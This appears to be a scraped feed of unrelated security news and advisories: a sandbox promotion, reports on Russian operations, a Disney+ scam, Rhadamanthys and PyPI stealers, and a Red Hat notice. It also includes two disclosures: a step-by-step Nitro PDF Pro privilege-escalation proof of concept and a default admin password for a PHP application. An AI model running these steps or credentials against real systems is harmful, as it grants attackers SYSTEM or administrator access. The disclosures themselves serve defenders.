Dynamic malware analysis is a key part of any threat investigation. It involves executing a sample of a malicious program in the isolated environment of a malware sandbox to monitor its behavior and gather actionable indicators. Effective analysis must be fast, in-depth, and precise. These five tools will help you achieve it with ease.
1. Interactivity
Having the ability to interact with the

Dynamic malware analysis is a key part of any threat investigation. It involves executing a sample of a malicious program in the isolated environment of a malware sandbox to monitor its behavior and gather actionable indicators. Effective analysis must be fast, in-depth, and precise. These five tools will help you achieve it with ease.

**1\. Interactivity**

Having the ability to interact with the malware and the system in real-time is a great advantage when it comes to dynamic analysis. This way, you can not only observe its execution but also see how it responds to your inputs and triggers specific behaviors.

Plus, it saves time by allowing you to download samples hosted on file-sharing websites or open those packed inside an archive, which is a common way to deliver payloads to victims.

The initial phishing email containing the malicious pdf and password for the archive

Check out this sandbox session in the ANY.RUN sandbox that shows how interactivity is used for analyzing the entire chain of attack, starting from a phishing email that contains a PDF attachment. The link inside the .pdf leads to a file-sharing website where a password-protected .zip is hosted.

The website hosting the .zip file

The sandbox allows us not only to download the archive but also to enter the password (which can be found in the email) and extract its contents to run the malicious payload.

You can manually enter a password to open protected archives in ANY.RUN

After launching the executable file found inside the archive, the sandbox instantly detects that the system has been infected with AsyncRAT, a popular malware family used by attackers to remotely control victims' machines and steal sensitive data.

ANY.RUN provides a conclusive verdict on every sample

It adds corresponding tags to the interface and generates a report on the threat.

Analyze files and URLs in a private, real-time environment of the ANY.RUN sandbox.

Get a 14-day free trial of the sandbox to test its capabilities.

**2\. Extraction of IOCs**

Collecting relevant indicators of compromise (IOCs) is one of the main objectives of dynamic analysis. Detonating malware in a live environment forces it to expose its C2 server addresses, encryption keys, and other settings that ensure its functionality and communication with the attackers.

Although such data is often protected and obfuscated by malware developers, some sandbox solutions are equipped with advanced IOC collecting capabilities, making it easy to identify the malicious infrastructure.

As part of each analysis session in ANY.RUN, you get a comprehensive IOC report

In ANY.RUN, you can quickly gather a variety of indicators, including file hashes, malicious URLs, C2 connections, DNS requests, and more.

AsyncRAT sample configuration extracted by the ANY.RUN sandbox

The ANY.RUN sandbox goes one step further by not only presenting a list of relevant indicators collected during the analysis session but also extracting configurations for dozens of popular malware families. See an example of a malware configuration in the following sandbox session.

Such configs are the most reliable source of actionable IOCs that you can utilize with no hesitation to enhance your detection systems and improve the effectiveness of your overall security measures.

**3\. MITRE ATT&CK Mapping**

Preventing potential attacks on your infrastructure is not just about proactively finding IOCs used by attackers. A more lasting method is to understand the tactics, techniques, and procedures (TTPs) employed in malware currently targeting your industry.

The MITRE ATT&CK framework helps you map these TTPs to let you see what the malware is doing and how it fits into the bigger threat picture. By understanding TTPs, you can build stronger defenses tailored to your organization and stop attackers at the doorstep.

TTPs of an AgentTesla malware sample analyzed in the ANY.RUN sandbox

See the following analysis of AgentTesla. The service registers all the main TTPs used in the attack and presents detailed descriptions for each of them.

All that's left to do is take into consideration this important threat intelligence and use it to strengthen your security mechanisms.

**4\. Network Traffic Analysis**

Dynamic malware analysis also requires a thorough examination of the network traffic generated by the malware.

Analysis of HTTP requests, connections, and DNS requests can provide insights into the malware's communication with external servers, the type of data being exchanged, and any malicious activities.

Network traffic analysis in the ANY.RUN sandbox

The ANY.RUN sandbox captures all network traffic and lets you view both received and sent packets in the HEX and text formats.

Suricata rule that detects AgentTesla's data exfiltration activity

Apart from simply recording the traffic, it is vital that the sandbox automatically detects harmful actions. To this end, ANY.RUN uses Suricata IDS rules that scan the network activity and provide notifications about threats.

You can also export data in PCAP format for detailed analysis using tools like Wireshark.

Try ANY.RUN's advanced network traffic analysis with a 14-day free trial.

**5\. Advanced Process Analysis**

To understand the malware's execution flow and its impact on the system, you need to have access to detailed information about the processes spawned by it. To assist you in this, your sandbox of choice must provide advanced process analysis that covers several areas.

Visual graph in the ANY.RUN sandbox showing AsynRAT malware's execution

For instance, visualizing the process tree in the ANY.RUN sandbox makes it easier to track the sequence of process creation and termination and identifies key processes that are critical for the malware's operation.

ANY.RUN sandbox notifies you about files with untrusted certificates

You also need to be able to verify the authenticity of the process by taking a look at its certificate details, including the issuer, status, and validity.

Process dump of the XWorm malware available for download in ANY.RUN

Another useful feature is process dumps, which may contain vital information, such as encryption keys used by the malware. An effective sandbox will let you easily download these dumps to conduct further forensic analysis.

ANY.RUN displays detailed breakdowns of PowerShell, JavaScript, and VBScript scripts

One of the recent trends in cyber attacks is the use of fileless malware which executes only in memory. To catch it, you need to have access to the scripts and commands being run during the infection process.

Files encrypted by the LockBit ransomware during analysis in the ANY.RUN sandbox

Tracking file creation, modification, and deletion events is another essential part of any investigation into malware's activities. It can help you reveal if a process is attempting to drop or modify files in sensitive areas, such as system directories or startup folders.

Example of XWorm using the the Run registry key to achieve persistence

Monitoring registry changes made by the process is crucial for understanding the malware's persistence mechanisms. The Windows Registry is a common target for malware-seeking persistence, as it can be used to run malicious code on startup or alter system behavior.

**Analyze Malware and Phishing Threats in ANY.RUN Sandbox**

ANY.RUN provides a cloud sandbox for malware and phishing analysis that delivers fast and accurate results to streamline your investigations. Thanks to interactivity, you can freely engage with the files and URLs you submit, as well as the system to explore the threat in-depth.

You can integrate ANY.RUN's advanced sandbox with features like Windows and Linux VMs, private mode, and teamwork in your organization.

Leave your trial request to test the ANY.RUN sandbox.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

5 Must-Have Tools for Effective Dynamic Malware Analysis

SSSCIP reports a strategic shift in Russian cyber operations in H1 2024. Targeting Ukraine’s defence sectors, attacks doubled,…

SSSCIP reports a strategic shift in Russian cyber operations in H1 2024. Targeting Ukraine’s defence sectors, attacks doubled, focusing on intelligence gathering. Ukrainian experts respond with red teaming to strengthen cyber defences against targeted threats.

Recent reports from Ukraine’s State Service of Special Communications and Information Protection (SSSCIP) reveal a significant shift in Russian cyber operations against Ukraine in the first half of 2024. The new strategy marks a departure from previous broad-spectrum attacks to a more targeted approach focusing on Ukraine’s military and defence sectors.

According to the SSSCIP’s “Russian Cyber Operations (H1 2024)” **report**, cyber attacks targeting Ukraine’s defence industries more than doubled from 111 to 276 from the latter half of 2023 to the former half of   2024. This surge reflects a concerted effort by Russian-aligned threat actors to gather intelligence directly related to the ongoing conflict.

In response to these escalating threats, Ukrainian cybersecurity experts have intensified their **red teaming** efforts, simulating sophisticated attacks to identify and address vulnerabilities in their defence systems. This proactive approach has helped strengthen Ukraine’s cyber resilience against increasingly targeted Russian operations.

****Key Threat Actors and Tactics****

The majority of the activity comes down to five Russian-attributed threat groups: **UAC-0149**, UAC-0020, UAC-0180, UAC-0184, UAC-0200. These groups have been employing remote access Trojans (RATs) to compromise Ukrainian Forces computers that use Windows.

Russian cyber tactics have changed direction over the past couple of years. In 2022, Russian hackers focused on dismantling critical infrastructure IT systems and exfiltrating databases. This focus shifted to broad information collection within many different Ukrainian industries in 2023, before honing in on military targets in 2024.

****Messaging Apps: The New Frontier****

A concerning trend highlighted in the report is the increased use of messaging apps including WhatsApp, Telegram and Signal. The Signal app in particular has been used to target high-value military and government personnel. Hackers, particularly those associated with UAC-0184, gather personal information to impersonate known contacts and build trust with certain targets, akin to a phishing attack.

The screenshot shows malicious messages on Signal, WhatsApp and Telegram sent by Russian hackers (Credit: SSSCIP)

Once trust is established, the attackers send malicious archives disguised as relevant content. This might be combat footage or recruitment information, for example. When opened, these archives secretly infect the target’s system with malware. It is worth noting that UAC-0184 is known for its multi-stage attack and for using **XWorm malware and Remcos RAT** against its targets.

****Rising Cyber Incidents and Malware Infections****

The total number of cyber attacks that were reported in Ukraine **rose by 19%** to 1,739 in Q1 and Q2 of 2024 compared to Q3 and Q4 of 2023. This rise is primarily attributed to more incidents considered to be less severe, and more critical breaches went down.

Malware infections are becoming a central part of these cyberattacks. The number of infections recorded in Q1 and Q2 of 2024 was 196, up from 103 in Q3 and Q4 of 2023. This surge is partly down to a rise in unlicensed software that has been pirated but with backdoors baked into it.

****Importance of Licensed Software****

The SSSCIP continues to hone in on the importance of using licensed software because unlicensed software creates more vulnerabilities. For example, Office, MDM, Windows, EDR, etc. This applies to the Ukrainian military, but also civilian organizations, as they try to mitigate vulnerabilities that stem from infections.

As the conflict enters its third year, cyberspace remains core to the warfare. The SSSCIP warns that cyberattacks targeting military personnel are likely to remain important.

1.  **Ukraine’s Cyberattack Cripples Russia’s Tax System**
2.  **Ukraine Claims Cyber Attack Disrupted Russian ATMs**
3.  **Ukrainian Hackers Trick Russian Military Wives for Personal Info**
4.  **Ukraine Claims Destruction of 280 Russian Servers, 2 Petabytes Lost**
5.  **Ukraine Thwart Russian Industroyer 2 Malware Attack on Energy Provider**

Russian Cyber Offensive Shifts Focus to Ukraine’s Military Infrastructure

Next time you need to activate a subscription on your TV, watch out for these fake sites scammers are using to trick you and steal your money.

A common way to activate digital subscriptions such as Netflix, Prime or Disney+ on a new TV is to visit a website and enter the code seen on your screen. It’s much easier than having to authenticate using a remote and typing a username and password.

Scammers are creating fake activation pages that they get indexed in Google to lure in victims. Once someone goes to one of these pages, they are redirected to a fake Microsoft scanner that claims child pornography was found on their computer.

Getting from the family-friendly Disney activation page to a very graphic alert is sure to get many victims to panic, even if they have done absolutely nothing wrong. You can see what this scheme looks like in the animation below:

**Malicious Google search results**

The scammers are using Search Engine Optimization (SEO) techniques to place their fraudulent sites on Google’s search results page. Unlike what we have seen before, these are not malicious ads but rather organic search results.

One of the fake websites, _disneyplusbegins\[.\]com_, is a play off the official website, which can be seen when you do a Google search for ‘disney plus begin’:

Clicking on the link will take you to the aforementioned fake site that appears to prompt users to enter their code:

When interacting with the page, victims are automatically redirected to another site hosted on Microsoft Azure. A fake Windows Defender scanner claims that “_Access to this PC has been blocked for security reasons. Alureon Spyware With Child Pornography Download Detected_“:

The page contains a background image with pornographic material, as if it were from sites victims may have visited:

Despite the scary warning page, this is all a scam and you do not need to call the phone number shown on screen. Scammers are waiting for people to call in so they can impersonate Microsoft, remotely log into your computer and either make you send them money or steal directly from your bank account.

**Safety tips**

Visiting a website to activate a new product or service is something we all do at some point. It is easier to quickly type a few keywords into Google rather than entering the full website URL.

However, Google search results can be laced with malicious ads or links to fraudulent pages. If there is a QR code to scan on your TV, you may want to use that instead (with caution) or maybe spend the extra few seconds it takes to type the full URL (making sure you don’t typo it!).

Finally, just know that these fake warning pages are just that, fake. You can simply close them down by clicking on the ‘X’ at the top right. One thing to be careful about is avoiding clicking anywhere else on the page, in particular buttons or images that may say something like “return to safety”. For more practical tips, check out this article on CNBC, in particular the “How to click without getting into online trouble” part.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Fake Disney+ activation page redirects to pornographic scam 

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition."
"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition."

"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies," Recorded Future's Insikt Group said in an analysis of version 0.7.0 of the malware.

"The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation."

First discovered in the wild in September 2022, Rhadamanthys has emerged as one of the most potent information stealers that are advertised under the malware-as-a-service (MaaS) model, alongside Lumma and others.

The malware continues to have an active presence despite suffering bans from underground forums like Exploit and XSS for targeting entities within Russia and the former Soviet Union, with its developer, who goes by the name "kingcrete" (aka "kingcrete2022"), finding ways to market the new versions on Telegram, Jabber, and TOX.

The cybersecurity company, which is set to be acquired by Mastercard for $2.65 billion, said the stealer is sold on a subscription basis for $250 per month (or $550 for 90 days), allowing its customers to harvest a wide range of sensitive information from compromised hosts.

This includes system information, credentials, cryptocurrency wallets, browser passwords, cookies, and data stored in various applications, while simultaneously taking steps to complicate analysis efforts within sandboxed environments.

Version 0.7.0, the most recent version of Rhadamanthys released in June 2024, significantly improves upon its predecessor 0.6.0, which came out in February 2024.

It comprises a "complete rewrite of both client-side and server-side frameworks, improving the program's execution stability," Recorded Future noted. "Additionally, 30 wallet-cracking algorithms, AI-powered graphics, and PDF recognition for phrase extraction were added. The text extraction capability was enhanced to identify multiple saved phrases."

Also included is a feature to allow threat actors to run and install Microsoft Software Installer(MSI) files in an apparent effort to evade detection by security solutions installed on the host. It further contains a setting to prevent re-execution within a configurable time frame.

Rhadamanthys's high-level infection chain

A noteworthy aspect of Rhadamanthys is its plugin system that can augment its capabilities with keylogger, cryptocurrency clipper, and reverse proxy functionality.

"Rhadamanthys is a popular choice for cybercriminals," Recorded Future said. "Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of."

The development comes as Google-owned Mandiant detailed Lumma Stealer's use of customized control flow indirection to manipulate the execution of the malware.

"This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections," researchers Nino Isakovic and Chuong Dong said.

Rhadamanthys and Lumma, alongside other stealer malware families like Meduza, StealC, Vidar, and WhiteSnake, have also been found releasing updates in recent weeks to collect cookies from the Chrome web browser, effectively bypassing newly introduced security mechanisms like app-bound encryption.

On top of that, the developers behind the WhiteSnake Stealer have added the ability to extract CVC codes from credit cards stored in Chrome, highlighting the ever-evolving nature of the malware landscape.

That's not all. Researchers have identified an Amadey malware campaign that deploys an AutoIt script, which then launches the victim's browser in kiosk mode to force them to enter their Google account credentials. The login information is stored in the browser's credential store on disk for subsequent harvesting by stealers such as StealC.

These ongoing updates also follow the discovery of new drive-by download campaigns that deliver information stealers by tricking users into manually copying and executing PowerShell code to prove they are human by means of a deceptive CAPTCHA verification page.

As part of the campaign, users searching for video streaming services on Google are redirected to malicious URL that urges them to press the Windows button + R to launch the Run menu, paste an encoded PowerShell command, and execute it, according to CloudSEK, eSentire, Palo Alto Networks Unit 42, and Secureworks.

The attack, which ultimately delivers stealers such as Lumma, StealC, and Vidar, is a variant of the ClickFix campaign documented in recent months by ReliaQuest, Proofpoint, McAfee Labs, and Trellix.

"This novel attack vector poses significant risk, as it circumvents browser security controls by opening a command prompt," Secureworks said. "The victim is then directed to execute unauthorized code directly on their host."

Phishing and malvertising campaigns have also been observed distributing Atomic macOS Stealer (AMOS), Rilide, as well as a new variant of a stealer malware called Snake Keylogger (aka 404 Keylogger or KrakenKeylogger).

Furthermore, information stealers like Atomic, Rhadamanthys, and StealC have been at the heart of over 30 scam campaigns orchestrated by a cybercrime gang known as Marko Polo to conduct cryptocurrency theft across platforms by impersonating legitimate brands in online gaming, virtual meetings and productivity software, and cryptocurrency.

"Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media — highlighting its focus on tech-savvy victims," Recorded Future said, adding "likely tens of thousands of devices have been compromised globally."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition

Checkmarx researchers discovered PyPI malware posing as crypto wallet tools. These malicious packages stole private keys and recovery…

Checkmarx researchers discovered PyPI malware posing as crypto wallet tools. These malicious packages stole private keys and recovery phrases, targeting wallets like Metamask, Trust Wallet, and Exodus.

The cybersecurity researchers at Checkmarx uncovered a series of new supply chain attacks that exploited the Python Package Index (**PyPI**) in September 2024 using malicious packages to target cryptocurrency wallets.

The attack involved a new user on the platform who uploaded several malicious packages designed to steal sensitive wallet data, including private keys and mnemonic phrases. These packages identified as “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes,” targeted cryptocurrency wallets including Atomic, Trust Wallet, Metamask, Ronin, TronLink, and Exodus.

According to the Checkmarx **report** shared with Hackread.com ahead of publishing on Tuesday, each package came with a professionally written README file, complete with installation instructions, usage examples, and even “best practices” for virtual environments.

Even more concerning, these documents included fake statistics, making the packages seem like well-maintained and popular projects, thus increasing their credibility and download count.

One of the key tactics used by the attacker was the distribution of functionality across multiple dependencies. Six of the malicious packages relied on a dependency called “cipherbcryptors,” which contained the core malicious code. In the context of a cyberattack, dependencies refer to any external components, systems, software, or third-party services that an organization relies upon to function properly.

Further analysis revealed that threat actors heavily obfuscated the code within the “cipherbcryptors” package, making it difficult for automated security tools and cybersecurity researchers to identify its malicious intent.

Unlike others, these malicious packages didn’t start infecting the device immediately upon installation. Instead, they remained inactive until the user attempted to use certain features. Once the user began using one of the features advertised by the threat actors, the malware would activate and access the targeted user’s cryptocurrency wallet.

It then stole important information, such as private keys and recovery phrases, which are needed to control and access cryptocurrency wallets. The stolen information was then encoded and sent to a server controlled by the attacker.

Malicious packages and the attack flow (Image credit: Checkmarx)

The impact of this type of **supply chain attack** can be severe for the victims. With access to private keys and recovery phrases, attackers can quickly drain cryptocurrency wallets. Due to the irreversible nature of blockchain transactions, once funds are stolen, recovering them is nearly impossible.

Therefore, software developers and unsuspecting users should be cautious of such attacks, especially when downloading packages from the PyPI platform, particularly those that offer cryptocurrency-related services and include access to wallets. **Cybersecurity training for employees** is also important in defending against these attacks, making protection a matter of common sense.

1.  **OpenSSF Launches Malicious Packages Repository**
2.  **Crypto Stealing PyPI Malware Hits Both Windows, Linux Users**
3.  **PyPI Suspends New Projects, Users Due to Malicious Packages**
4.  **Hackers Exploit PyPI to Infiltrate Systems with Python Packages**
5.  **Luna Grabber Malware Hits Roblox Devs Through npm Packages**

New PyPI Malware Poses as Crypto Wallet Tools to Steal Private Keys

The Nitro PDF Pro application uses a .msi installer file (embedded into an executable .exe installer file) for installation. The MSI installer uses custom actions in repair mode in an unsafe way. Attackers with low-privileged system access to a Windows system where Nitro PDF Pro is installed, can exploit the cached MSI installer's custom actions to effectively escalate privileges and get a command prompt running in context of NT AUTHORITY\SYSTEM. Versions prior to 14.26.1.0 and 13.70.8.82 and affected.

SEC Consult Vulnerability Lab Security Advisory < 20240930-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI Installer  
            product: Nitro PDF Pro  
 vulnerable version: <14.26.1.0  
                     <13.70.8.82  
      fixed version: 14.26.1.0 or higher  
                     13.70.8.82 or higher  
         CVE number: CVE-2024-35288  
             impact: high  
           homepage: https://www.gonitro.com/  
              found: 2023-12-19  
                 by: Sandro Einfeldt  
                     Michael Baer (Office Munich)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are on a mission to deliver a one-of-a-kind platform that accelerates   
document productivity for businesses around the world.

Nitro was born in a bustling Melbourne laneway back in 2005. It started   
with a team of three, a single product and a goal to provide the world   
with better tools for everyday work. Our team now spans the globe and   
works with over half of the Fortune 500, but we haven't strayed too far   
from our roots. We put our customers, employees, and communities at the   
center of everything we do."

Source: https://www.gonitro.com/about/our-story

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)   
The Nitro PDF Pro application uses a .msi installer file (embedded into an   
executable .exe installer file) for installation. The MSI installer uses custom   
actions in repair mode in an unsafe way. Attackers with low-privileged system   
access to a Windows system where Nitro PDF Pro is installed, can exploit the   
cached MSI installer's custom actions to effectively escalate privileges and get   
a command prompt running in context of NT AUTHORITY\SYSTEM. 

Note:   
This attack does not work using a recent version of the Edge Browser or   
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be   
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)  
After the installation of the software in standard configuration, any low-  
privileged user can access the cached (randomly named) .msi file in the   
following directory:

C:\Windows\Installer

A low privileged attacker can start the installer in repair mode   
(which is then running with SYSTEM privileges) without UAC popping up,   
by using the following command:

msiexec.exe /fa C:\Installer\<installer name>.msi

At the end of the repair process, three sub-processes (certutil.exe), called   
by MSI custom actions, perform the following operations:

[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority_2021-2036.cer"  

The previously mentioned operations get executed in a conhost.exe window in   
the context of NT AUTHORITY\SYSTEM. The attacker can use the appearing   
conhost.exe windows to get an elevated command prompt. Therefore, the attacker   
has to interrupt the execution flow of one of the certutil operations before   
the conhost.exe window closes. This can be done by locking the file operations   
on one of the following files:  

notarius-root-certificate-authority.cer  
notarius-certificate-authority.cer   
notarius-root-certificate-authority_2021-2036.cer

For this purpose, the attacker can use SetOpLock.exe from the following source:

https://github.com/googleprojectzero/symboliclink-testing-tools

To lock all operations on one of the previously mentioned files, the attacker  
has to use the following syntax:

while ($true) {  
   .\SetOpLock.exe <Path> x   
}

For example, to lock the operations on the first of the mentioned files, the   
following command loop can be used:

while ($true) {  
  .\SetOpLock.exe "C:\Program Files\Nitro\PDF Pro\14\notarius-root-certificate-authority.cer" x   
}

The tool will lock any operation on the file until the attacker presses Enter.  
While executing the previously mentioned msiexec-command, multiple operation  
locks will get triggered. The attacker has to skip multiple of them (by  
pressing Enter) until a conhost.exe window opens. The conhost.exe process is   
running with SYSTEM privileges and can be used to escalate privileges. The   
following steps have to be conducted:

1. Right click on the top bar of the conhost.exe window.  
2. Click on "Properties".  
3. Under options, click on the "Legacyconsolemode" link.  
4. Open the link with a browser other than Internet Explorer or Edge (both   
   don't open as SYSTEM in Windows 11).  
5. In the opened browser window press the key combination "CTRL+o".  
6. Type "C:\Windows\System32\cmd.exe" in the top bar and press Enter.

A command prompt should open with the user permission context of   
NT AUTHORITY\SYSTEM. The privileges have been escalated and the system is   
fully compromised.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* Nitro PDF Pro 14.18.1.41

According to the vendor, version branch 13 is also affected. The vendor  
confirmed that the following versions are vulnerable:

* Nitro PDF Pro <14.26.1.0  
* Nitro PDF Pro <13.70.8.82

Vendor contact timeline:  
------------------------  
2023-12-22: Contacting vendor through security@gonitro.com; asking for PGP key.  
            No response.  
2024-01-11: Asking whether our email was received  
2024-01-15: Vendor response: high workload, requesting security advisory,  
            PGP key will be shared in another email.   
2024-01-16: No PGP key received, asking again.  
2024-01-17: Sending encrypted security advisory.  
2024-01-30: Asking for a status update.  
2024-02-01: Vendor is currently investigating the issue to ensure it applies  
            to the latest version of the Pro software.  
2024-02-12: Vendor asking for tested Windows version.  
2024-02-13: Tested with Windows 10, referenced advisory information to only  
            use Firefox or Chrome browser, not Edge/IE.  
2024-03-05: Asking for a status update, if the issue could be reproduced, whether  
            we should reserve a CVE number.  
2024-03-07: Vendor will provide update in a few days, few issues in the queue.  
            Will ask internally regarding CVE.  
2024-04-08: Asking for status update. Setting advisory disclosure date  
            to 17th April.  
2024-04-08: Vendor was unable to reproduce issue, asking for a video to  
            verify the issue.  
2024-04-09: Providing POC video to the vendor.  
2024-04-11: Vendor still unable to reproduce.  
            Suggesting short call to demonstrate the issue; no response.  
2024-04-16: Asking how to proceed now.  
            Vendor: was now able to reproduce the issue on Windows 10,  
            patch implementation will be expedited.  
            Telling the vendor that we will wait for the patch, asking  
            if they reserve a CVE.  
2024-05-02: Vendor: CVE is being requested, patch is planned as soon as   
            possible.  
2024-05-02: Confirming advisory release after patch is available and   
            other necessary details (fixed version number, CVE, etc).  
2024-05-21: Vendor is still waiting for CVE.  
2024-05-22: Asking whether the issue is otherwise fixed, asking for version  
            number etc; No response.  
2024-06-17: Asking for status update again, regarding patch & CVE.  
            Fix is completed for current version 14.x, preparing a patch, but  
            also checking previous versions.  
2024-06-21: Vendor informs us that version 13 is also affected which takes  
            more time to backport.   
2024-06-24: Giving more time to patch and coordinate release versions.   
            Questions about CVE.  
2024-06-24: Vendor responds that CVE-2024-35288 can be used.  
2024-07-15: Vendor releases version 14.26.1.0 which includes the fix for v14.  
2024-09-17: Vendor informs us that security update for v13 is scheduled for  
            25th September (seems we did not receive this email).  
2024-09-23: Vendor following up regarding patch schedule & acknowledgement.  
2024-09-24: Confirming receipt of email and patch day, our advisory will be  
            scheduled for early next week.  
2024-09-24: Vendor provides affected version numbers.  
2024-09-25: Asking vendor for clarification regarding version numbers.  
2024-09-25: Vendor sends version numbers for the fix (13.70.8.82, 14.26.1.0)  
2024-09-30: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides a patch in version 13.70.8.82 and 14.26.1.0 which can be  
downloaded from the following URL:  
https://www.gonitro.com/product-details/downloads/pdf-pro

The vendor released a security advisory as well:  
https://www.gonitro.com/security/updates

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Sandro Einfeldt, Michael Baer, Johannes Greil / @2024

Nitro PDF Pro Local Privilege Escalation

Red Hat Security Advisory 2024-7436-03 - The components for Red Hat OpenShift for Windows Containers 10.17.0 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7436.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.17.0 product release  
Advisory ID:        RHSA-2024:7436-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7436  
Issue date:         2024-10-01  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

The components for Red Hat OpenShift for Windows Containers 10.17.0 are now available. This product release includes bug fixes and security updates for the  
following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/OCPBUGS-29253  
https://issues.redhat.com/browse/OCPBUGS-30995  
https://issues.redhat.com/browse/OCPBUGS-35936  
https://issues.redhat.com/browse/OCPBUGS-36395  
https://issues.redhat.com/browse/OCPBUGS-36643  
https://issues.redhat.com/browse/WINC-1149  
https://issues.redhat.com/browse/WINC-1172  
https://issues.redhat.com/browse/WINC-1199  
https://issues.redhat.com/browse/WINC-1224  
https://issues.redhat.com/browse/WINC-1305  
https://issues.redhat.com/browse/WINC-1314  
https://issues.redhat.com/browse/WINC-1320  
https://issues.redhat.com/browse/WINC-588

Red Hat Security Advisory 2024-7436-03

Student Study Center Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Student Study Center Management System 1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Study Center Management System 1.0 Insecure Settings

Student Management System version 1.0 suffers from an ignored default credential vulnerability.

